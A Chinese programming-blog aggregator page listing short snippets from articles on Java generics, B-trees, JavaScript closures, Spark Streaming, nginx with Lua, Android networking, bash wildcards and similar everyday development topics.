    html代码: <h1 id="anchor">页面标题</h1> <div id="container">页面内容</div> <p><a href="#anchor" class="topLink">回到顶端</a><
  • B树、B-树、B+树、B*树 矮蛋蛋 B树
    原文地址: http://www.cnblogs.com/oldhorse/archive/2009/11/16/1604009.html B树        即二叉搜索树:        1.所有非叶子结点至多拥有两个儿子(Left和Right); &nb
  • 数据库连接池 alafqq 数据库连接池
    http://www.cnblogs.com/xdp-gacl/p/4002804.html @Anthor:孤傲苍狼 数据库连接池 用MySQLv5版本的数据库驱动没有问题,使用MySQLv6和Oracle的数据库驱动时候报如下错误: java.lang.ClassCastException: $Proxy0 cannot be cast to java.sql.Connec
  • java泛型 百合不是茶 java泛型
    泛型 在Java SE 1.5之前,没有泛型的情况的下,通过对类型Object的引用来实现参数的“任意化”,任意化的缺点就是要实行强制转换,这种强制转换可能会带来不安全的隐患   泛型的特点:消除强制转换 确保类型安全 向后兼容   简单泛型的定义:      泛型:就是在类中将其模糊化,在创建对象的时候再具体定义 class fan
  • javascript闭包[两个小测试例子] bijian1013 JavaScriptJavaScript
    一.程序一 <script> var name = "The Window"; var Object_a = {   name : "My Object",   getNameFunc : function(){ var that = this;     return function(){     
  • 探索JUnit4扩展:假设机制(Assumption) bijian1013 javaAssumptionJUnit单元测试
    一.假设机制(Assumption)概述        理想情况下,写测试用例的开发人员可以明确的知道所有导致他们所写的测试用例不通过的地方,但是有的时候,这些导致测试用例不通过的地方并不是很容易的被发现,可能隐藏得很深,从而导致开发人员在写测试用例时很难预测到这些因素,而且往往这些因素并不是开发人员当初设计测试用例时真正目的,
  • 【Gson四】范型POJO的反序列化 bit1129 POJO
    在下面这个例子中,POJO(Data类)是一个范型类,在Tests中,指定范型类为PieceData,POJO初始化完成后,通过 String str = new Gson().toJson(data); 得到范型化的POJO序列化得到的JSON串,然后将这个JSON串反序列化为POJO   import com.google.gson.Gson; import java.
  • 【Spark八十五】Spark Streaming分析结果落地到MySQL bit1129 Stream
    几点总结: 1. DStream.foreachRDD是一个Output Operation,类似于RDD的action,会触发Job的提交。DStream.foreachRDD是数据落地很常用的方法 2. 获取MySQL Connection的操作应该放在foreachRDD的参数(是一个RDD[T]=>Unit的函数类型),这样,当foreachRDD方法在每个Worker上执行时,
  • NGINX + LUA实现复杂的控制 ronin47 nginx lua
    安装lua_nginx_module 模块 lua_nginx_module 可以一步步的安装,也可以直接用淘宝的OpenResty Centos和debian的安装就简单了。。 这里说下freebsd的安装: fetch http://www.lua.org/ftp/lua-5.1.4.tar.gz tar zxvf lua-5.1.4.tar.gz cd lua-5.1.4 ma
  • java-递归判断数组是否升序 bylijinnan java
    public class IsAccendListRecursive { /*递归判断数组是否升序 * if a Integer array is ascending,return true * use recursion */ public static void main(String[] args){ IsAccendListRecursiv
  • Netty源码学习-DefaultChannelPipeline2 bylijinnan javanetty
    Netty3的API http://docs.jboss.org/netty/3.2/api/org/jboss/netty/channel/ChannelPipeline.html 里面提到ChannelPipeline的一个“pitfall”: 如果ChannelPipeline只有一个handler(假设为handlerA)且希望用另一handler(假设为handlerB) 来
  • Java工具之JPS chinrui java
    JPS使用     熟悉Linux的朋友们都知道,Linux下有一个常用的命令叫做ps(Process Status),是用来查看Linux环境下进程信息的。同样的,在Java Virtual Machine里面也提供了类似的工具供广大Java开发人员使用,它就是jps(Java Process Status),它可以用来
  • window.print分页打印 ctrain window
    function init() { var tt = document.getElementById("tt"); var childNodes = tt.childNodes[0].childNodes; var level = 0; for (var i = 0; i < childNodes.length; i++) {
  • 安装hadoop时 执行jps命令Error occurred during initialization of VM daizj jdkhadoopjps
    在安装hadoop时,执行JPS出现下面错误   [slave16][email protected]:/tmp/hsperfdata_hdfs# jps Error occurred during initialization of VM java.lang.Error: Properties init: Could not determine current working
  • PHP开发大型项目的一点经验 dcj3sjt126com PHP重构
    一、变量 最好是把所有的变量存储在一个数组中,这样在程序的开发中可以带来很多的方便,特别是当程序很大的时候。变量的命名就当适合自己的习惯,不管是用拼音还是英语,至少应当有一定的意义,以便适合记忆。变量的命名尽量规范化,不要与PHP中的关键字相冲突。 二、函数 PHP自带了很多函数,这给我们程序的编写带来了很多的方便。当然,在大型程序中我们往往自己要定义许多个函数,几十
  • android笔记之--向网络发送GET/POST请求参数 dcj3sjt126com android
    使用GET方法发送请求 private static boolean sendGETRequest (String path, Map<String, String> params) throws Exception{ //发送地http://192.168.100.91:8080/videoServi
  • linux复习笔记 之bash shell (3) 通配符 eksliang linux 通配符linux通配符
    转载请出自出处: http://eksliang.iteye.com/blog/2104387 在bash的操作环境中有一个非常有用的功能,那就是通配符。 下面列出一些常用的通配符,如下表所示 符号 意义 * 万用字符,代表0个到无穷个任意字符 ? 万用字符,代表一定有一个任意字符 [] 代表一定有一个在中括号内的字符。例如:[abcd]代表一定有一个字符,可能是a、b、c
  • Android关于短信加密 gqdy365 android
    关于Android短信加密功能,我初步了解的如下(只在Android应用层试验):     1、因为Android有短信收发接口,可以调用接口完成短信收发;         发送过程:APP(基于短信应用修改)接受用户输入号码、内容——>APP对短信内容加密——>调用短信发送方法Sm
  • asp.net在网站根目录下创建文件夹 hvt .netC#hovertreeasp.netWeb Forms
    假设要在asp.net网站的根目录下建立文件夹hovertree,C#代码如下: string m_keleyiFolderName = Server.MapPath("/hovertree"); if (Directory.Exists(m_keleyiFolderName)) { //文件夹已经存在 return; } else { try { D
  • 一个合格的程序员应该读过哪些书 justjavac 程序员书籍
    编者按:2008年8月4日,StackOverflow 网友 Bert F 发帖提问:哪本最具影响力的书,是每个程序员都应该读的? “如果能时光倒流,回到过去,作为一个开发人员,你可以告诉自己在职业生涯初期应该读一本, 你会选择哪本书呢?我希望这个书单列表内容丰富,可以涵盖很多东西。” 很多程序员响应,他们在推荐时也写下自己的评语。 以前就有国内网友介绍这个程序员书单,不过都是推荐数
  • 单实例实践 跑龙套_az 单例
       1、内部类 public class Singleton { private static class SingletonHolder { public static Singleton singleton = new Singleton(); } public Singleton getRes
  • PO VO BEAN 理解 q137681467 VODTOpo
    PO:      全称是 persistant object持久对象 最形象的理解就是一个PO就是数据库中的一条记录。 好处是可以把一条记录作为一个对象处理,可以方便的转为其它对象。     BO:     全称是 business object:业务对象 主要作用是把业务逻辑封装为一个对象。这个对
  • 战胜惰性,暗自努力 金笛子 努力
    偶然看到一句很贴近生活的话:“别人都在你看不到的地方暗自努力,在你看得到的地方,他们也和你一样显得吊儿郎当,和你一样会抱怨,而只有你自己相信这些都是真的,最后也只有你一人继续不思进取。”很多句子总在不经意中就会戳中一部分人的软肋,我想我们每个人的周围总是有那么些表现得“吊儿郎当”的存在,是否你就真的相信他们如此不思进取,而开始放松了对自己的要求随波逐流呢? 我有个朋友是搞技术的,平时嘻嘻哈哈,以
  • NDK/JNI二维数组多维数组传递 wenzongliang 二维数组jniNDK
    多维数组和对象数组一样处理,例如二维数组里的每个元素还是一个数组 用jArray表示,直到数组变为一维的,且里面元素为基本类型,去获得一维数组指针。给大家提供个例子。已经测试通过。 Java_cn_wzl_FiveChessView_checkWin( JNIEnv* env,jobject thiz,jobjectArray qizidata) { jint i,j; int s
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他